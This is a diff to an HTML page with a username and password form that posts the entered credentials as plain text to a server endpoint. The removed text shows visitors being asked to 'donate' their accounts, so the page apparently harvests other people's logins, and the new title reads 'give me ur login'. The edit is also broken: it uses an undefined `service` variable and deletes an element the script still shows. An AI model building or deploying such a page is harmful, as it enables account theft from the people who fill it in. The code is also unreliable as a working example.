--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html>
     <head>
-        <title>Tarzaui</title>
+        <title>give me ur login</title>
         <style>
             * {
                 font-family: monospace;
@@ -15,10 +15,9 @@
         <form id="form">
             <input type="text" id="username" placeholder="Username" />
             <input type="text" id="password" placeholder="Password" />
-            <input type="text" id="trackingcode" placeholder="Tracking Code" /><p>It is recommended that you enter a tracking code like "7512" to allow easier verification of the owner.</p>
+            <input type="text" id="trackingcode" placeholder="Service" />
             <button type="submit">Send</button>
         </form>
-        <p style="color: red; font-family: monospace; display: none;" id="info">It is greatly appreciated that you donate your account. If you want your account back please message PumpkinDoesScratch. <br><br>* Your projects, studios, and profile information will not be tampered with.</p>
         <script>
             const form = document.getElementById('form');
             
@@ -36,7 +35,7 @@
                 const res = await fetch('/api/server', {
                   method: 'POST',
                   headers: { 'Content-Type': 'application/json' },
-                  body: JSON.stringify({ content: `${username}, ${password}, TC: ${trackingcode}` })
+                  body: JSON.stringify({ content: `${username}, ${password}, Service: ${service}` })
                 });
                 document.getElementById("info").style.display = "block";
                 document.getElementById('username').value = '';
